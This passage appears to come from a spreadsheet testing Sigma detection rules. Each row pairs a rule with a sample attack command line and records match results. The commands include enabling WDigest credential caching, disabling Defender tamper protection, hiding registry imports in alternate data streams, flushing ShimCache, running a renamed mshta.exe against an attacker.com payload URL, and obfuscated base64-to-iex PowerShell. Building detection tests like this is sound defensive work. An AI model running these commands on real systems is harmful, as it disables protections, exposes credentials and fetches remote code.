      <c r="A1649" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B1649" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_susp_paths</t>
        </is>
      </c>
      <c r="C1649" s="36" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths</t>
        </is>
      </c>
      <c r="D1649" s="36" t="inlineStr">
        <is>
          <t>b7e2a8d4-74bb-4b78-adc9-3f92af2d4829</t>
        </is>
      </c>
      <c r="E1649" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"  /v  UseLogonCredential  /t  REG_DWORD  /d  1  /f</t>
        </is>
      </c>
      <c r="F1649" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1649" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1649" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1649" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829)</t>
        </is>
      </c>
      <c r="J1649" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1649" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1650" ht="15.75" customHeight="1" s="42">
      <c r="A1650" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B1650" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_susp_paths</t>
        </is>
      </c>
      <c r="C1650" s="36" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths</t>
        </is>
      </c>
      <c r="D1650" s="36" t="inlineStr">
        <is>
          <t>b7e2a8d4-74bb-4b78-adc9-3f92af2d4829</t>
        </is>
      </c>
      <c r="E1650" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender""\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F1650" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1650" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1650" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1650" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Suspicious Windows Defender Registry Key Tampering Via Reg.EXE (452bce90-6fb0-43cc-97a5-affc283139b3)</t>
        </is>
      </c>
      <c r="J1650" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1650" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1651" ht="15.75" customHeight="1" s="42">
      <c r="A1651" s="43" t="n"/>
      <c r="B1651" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_import_keys</t>
        </is>
      </c>
      <c r="C1651" s="36" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File</t>
        </is>
      </c>
      <c r="D1651" s="36" t="inlineStr">
        <is>
          <t>73bba97f-a82d-42ce-b315-9182e76c57b1</t>
        </is>
      </c>
      <c r="E1651" s="43" t="inlineStr">
        <is>
          <t>reg.exe import "C:\path\to\malicious.reg"</t>
        </is>
      </c>
      <c r="F1651" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1651" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1651" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1651" s="43" t="n"/>
      <c r="J1651" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1651" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1652" ht="15.75" customHeight="1" s="42">
      <c r="A1652" s="43" t="n"/>
      <c r="B1652" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_import_keys_ads</t>
        </is>
      </c>
      <c r="C1652" s="36" t="inlineStr">
        <is>
          <t>Imports Registry Key From an ADS</t>
        </is>
      </c>
      <c r="D1652" s="36" t="inlineStr">
        <is>
          <t>0b80ade5-6997-4b1d-99a1-71701778ea61</t>
        </is>
      </c>
      <c r="E1652" s="36" t="inlineStr">
        <is>
          <t>copy regedit.exe trusted.exe &amp;&amp; trusted.exe /s "C:\temp\file.txt:payload.reg"</t>
        </is>
      </c>
      <c r="F1652" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1652" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1652" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1652" s="43" t="n"/>
      <c r="J1652" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1652" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1653" ht="15.75" customHeight="1" s="42">
      <c r="A1653" s="43" t="n"/>
      <c r="B1653" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_import_keys_ads</t>
        </is>
      </c>
      <c r="C1653" s="36" t="inlineStr">
        <is>
          <t>Imports Registry Key From an ADS</t>
        </is>
      </c>
      <c r="D1653" s="36" t="inlineStr">
        <is>
          <t>0b80ade5-6997-4b1d-99a1-71701778ea61</t>
        </is>
      </c>
      <c r="E1653" s="36" t="inlineStr">
        <is>
          <t>reg.exe import "C:\path\to\file.txt:hidden.reg"</t>
        </is>
      </c>
      <c r="F1653" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1653" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1653" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1653" s="43" t="n"/>
      <c r="J1653" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1653" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1654" ht="15.75" customHeight="1" s="42">
      <c r="A1654" s="43" t="n"/>
      <c r="B1654" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regini_ads</t>
        </is>
      </c>
      <c r="C1654" s="43" t="inlineStr">
        <is>
          <t>Suspicious Registry Modification From ADS Via Regini.EXE</t>
        </is>
      </c>
      <c r="D1654" s="43" t="inlineStr">
        <is>
          <t>77946e79-97f1-45a2-84b4-f37b5c0d8682</t>
        </is>
      </c>
      <c r="E1654" s="43" t="inlineStr">
        <is>
          <t>reg.exe import C:\path\to\registry_file.reg</t>
        </is>
      </c>
      <c r="F1654" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1654" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1654" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1654" s="43" t="n"/>
      <c r="J1654" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1654" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1655" ht="15.75" customHeight="1" s="42">
      <c r="A1655" s="36" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B1655" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_shimcache_flush</t>
        </is>
      </c>
      <c r="C1655" s="36" t="inlineStr">
        <is>
          <t>ShimCache Flush</t>
        </is>
      </c>
      <c r="D1655" s="36" t="inlineStr">
        <is>
          <t>b0524451-19af-4efa-a46f-562a977f792e</t>
        </is>
      </c>
      <c r="E1655" s="36" t="inlineStr">
        <is>
          <t>Rundll32.exe apphelp.dll,#250</t>
        </is>
      </c>
      <c r="F1655" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1655" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1655" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1655" s="36" t="inlineStr">
        <is>
          <t>ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e); ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e)</t>
        </is>
      </c>
      <c r="J1655" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1655" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1656" ht="15.75" customHeight="1" s="42">
      <c r="A1656" s="36" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B1656" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_shimcache_flush</t>
        </is>
      </c>
      <c r="C1656" s="36" t="inlineStr">
        <is>
          <t>ShimCache Flush</t>
        </is>
      </c>
      <c r="D1656" s="36" t="inlineStr">
        <is>
          <t>b0524451-19af-4efa-a46f-562a977f792e</t>
        </is>
      </c>
      <c r="E1656" s="36" t="inlineStr">
        <is>
          <t>Rundll32.exe "apphelp".dll,ShimFlushCache</t>
        </is>
      </c>
      <c r="F1656" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1656" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1656" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1656" s="36" t="n"/>
      <c r="J1656" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1656" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1657" ht="15.75" customHeight="1" s="42">
      <c r="A1657" s="36" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B1657" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_shimcache_flush</t>
        </is>
      </c>
      <c r="C1657" s="36" t="inlineStr">
        <is>
          <t>ShimCache Flush</t>
        </is>
      </c>
      <c r="D1657" s="36" t="inlineStr">
        <is>
          <t>b0524451-19af-4efa-a46f-562a977f792e</t>
        </is>
      </c>
      <c r="E1657" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c Rundll32.exe apphelp.dll,Sh^imFlushCache</t>
        </is>
      </c>
      <c r="F1657" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1657" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1657" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1657" s="36" t="inlineStr">
        <is>
          <t>ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e); ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e)</t>
        </is>
      </c>
      <c r="J1657" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1657" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1658" ht="15.75" customHeight="1" s="42">
      <c r="A1658" s="36" t="n"/>
      <c r="B1658" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_runonce_execution</t>
        </is>
      </c>
      <c r="C1658" s="36" t="inlineStr">
        <is>
          <t>Run Once Task Execution as Configured in Registry</t>
        </is>
      </c>
      <c r="D1658" s="36" t="inlineStr">
        <is>
          <t>198effb6-6c98-4d0c-9ea3-451fa143c45c</t>
        </is>
      </c>
      <c r="E1658" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\runonce.exe /Config</t>
        </is>
      </c>
      <c r="F1658" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1658" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1658" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1658" s="36" t="n"/>
      <c r="J1658" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1658" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1659" ht="15.75" customHeight="1" s="42">
      <c r="A1659" s="36" t="n"/>
      <c r="B1659" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1659" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1659" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1659" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1659" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1659" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1659" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1659" s="36" t="n"/>
      <c r="J1659" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1659" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1660" ht="15.75" customHeight="1" s="42">
      <c r="A1660" s="36" t="n"/>
      <c r="B1660" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1660" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1660" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1660" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1660" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1660" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1660" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1660" s="43" t="n"/>
      <c r="J1660" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1660" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1661" ht="15.75" customHeight="1" s="42">
      <c r="A1661" s="36" t="n"/>
      <c r="B1661" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1661" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1661" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1661" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1661" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1661" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1661" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1661" s="36" t="n"/>
      <c r="J1661" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1661" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1662" ht="15.75" customHeight="1" s="42">
      <c r="A1662" s="36" t="n"/>
      <c r="B1662" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1662" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1662" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1662" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1662" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1662" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1662" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1662" s="36" t="n"/>
      <c r="J1662" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1662" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1663" ht="15.75" customHeight="1" s="42">
      <c r="A1663" s="43" t="n"/>
      <c r="B1663" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1663" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1663" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1663" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1663" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1663" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1663" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1663" s="43" t="n"/>
      <c r="J1663" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1663" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1664" ht="15.75" customHeight="1" s="42">
      <c r="A1664" s="36" t="n"/>
      <c r="B1664" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1664" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1664" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1664" s="43" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1664" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1664" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1664" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1664" s="43" t="n"/>
      <c r="J1664" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1664" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1665" ht="15.75" customHeight="1" s="42">
      <c r="A1665" s="43" t="n"/>
      <c r="B1665" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1665" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1665" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1665" s="43" t="inlineStr">
        <is>
          <t>powershell -Nop -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1665" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1665" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1665" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1665" s="43" t="n"/>
      <c r="J1665" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1665" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1666" ht="15.75" customHeight="1" s="42">
      <c r="A1666" s="43" t="n"/>
      <c r="B1666" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ilasm_il_code_compilation</t>
        </is>
      </c>
      <c r="C1666" s="43" t="inlineStr">
        <is>
          <t>C# IL Code Compilation Via Ilasm.EXE</t>
        </is>
      </c>
      <c r="D1666" s="43" t="inlineStr">
        <is>
          <t>850d55f9-6eeb-4492-ad69-a72338f65ba4</t>
        </is>
      </c>
      <c r="E1666" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe C:\Users\Public\not_ilasm.exe &amp;&amp; C:\Users\Public\not_ilasm.exe /output:malicious.dll malicious.il</t>
        </is>
      </c>
      <c r="F1666" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1666" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1666" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1666" s="43" t="n"/>
      <c r="J1666" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1666" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1667" ht="15.75" customHeight="1" s="42">
      <c r="A1667" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B1667" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C1667" s="36" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D1667" s="36" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E1667" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mshta.exe C:\Users\Public\Update.com &amp;&amp; C:\Users\Public\Update.com http://attacker.com/payload</t>
        </is>
      </c>
      <c r="F1667" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1667" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1667" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1667" s="36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1667" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1667" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1668" ht="15.75" customHeight="1" s="42">
      <c r="A1668" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B1668" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C1668" s="36" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D1668" s="36" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E1668" s="36" t="inlineStr">
        <is>
          <t>mshta.exe "C:\Users\Public\script.hta"</t>
        </is>
      </c>
      <c r="F1668" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1668" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1668" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1668" s="43" t="inlineStr">
        <is>
          <t>Suspicious Mshta.EXE Execution Patterns (e32f92d1-523e-49c3-9374-bdb13b46a3ba); Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J1668" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1668" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1669" ht="15.75" customHeight="1" s="42">
      <c r="A1669" s="43" t="n"/>
      <c r="B1669" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ping_hex_ip</t>
        </is>
      </c>
      <c r="C1669" s="36" t="inlineStr">
        <is>
          <t>Ping Hex IP</t>
        </is>
      </c>
      <c r="D1669" s="36" t="inlineStr">
        <is>
          <t>1a0d4aba-7668-4365-9ce4-6d79ab088dfd</t>
        </is>
      </c>
      <c r="E1669" s="36" t="inlineStr">
        <is>
          <t>ping 0177.0000.0000.0001</t>
        </is>
      </c>
      <c r="F1669" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1669" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1669" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1669" s="36" t="n"/>
      <c r="J1669" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1669" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1670" ht="15.75" customHeight="1" s="42">
      <c r="A1670" s="43" t="n"/>
      <c r="B1670" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ping_hex_ip</t>
        </is>
      </c>
      <c r="C1670" s="36" t="inlineStr">
        <is>
          <t>Ping Hex IP</t>
        </is>
      </c>
      <c r="D1670" s="36" t="inlineStr">
        <is>
          <t>1a0d4aba-7668-4365-9ce4-6d79ab088dfd</t>
        </is>
      </c>
      <c r="E1670" s="36" t="inlineStr">
        <is>
          <t>ping 2130706433</t>
        </is>
      </c>
      <c r="F1670" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1670" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1670" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1670" s="36" t="inlineStr">
        <is>
          <t>Obfuscated IP Via CLI (56d19cb4-6414-4769-9644-1ed35ffbb148)</t>
        </is>
      </c>
      <c r="J1670" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1670" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1671" ht="15.75" customHeight="1" s="42">
      <c r="A1671" s="43" t="n"/>
      <c r="B1671" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ping_hex_ip</t>
        </is>
      </c>
      <c r="C1671" s="36" t="inlineStr">
        <is>
          <t>Ping Hex IP</t>
        </is>
      </c>
      <c r="D1671" s="36" t="inlineStr">
        <is>
          <t>1a0d4aba-7668-4365-9ce4-6d79ab088dfd</t>
        </is>
      </c>
      <c r="E1671" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\ping.exe C:\Windows\Temp\p.exe &amp;&amp; C:\Windows\Temp\p.exe 0x7f000001</t>
        </is>
      </c>
      <c r="F1671" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1671" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1671" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1671" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1671" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1671" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1672" ht="15.75" customHeight="1" s="42">
      <c r="A1672" s="43" t="n"/>
      <c r="B1672" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1672" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1672" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1672" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F1672" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1672" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1672" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1672" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J1672" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1672" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1673" ht="15.75" customHeight="1" s="42">
      <c r="A1673" s="43" t="n"/>
      <c r="B1673" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1673" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1673" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1673" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F1673" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1673" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1673" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1673" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J1673" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1673" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1674" ht="15.75" customHeight="1" s="42">
      <c r="A1674" s="43" t="n"/>
      <c r="B1674" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1674" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1674" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1674" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAnd "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F1674" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1674" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1674" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1674" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J1674" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1674" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1675" ht="15.75" customHeight="1" s="42">
      <c r="A1675" s="43" t="n"/>
      <c r="B1675" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1675" s="36" t="inlineStr">
        <is>
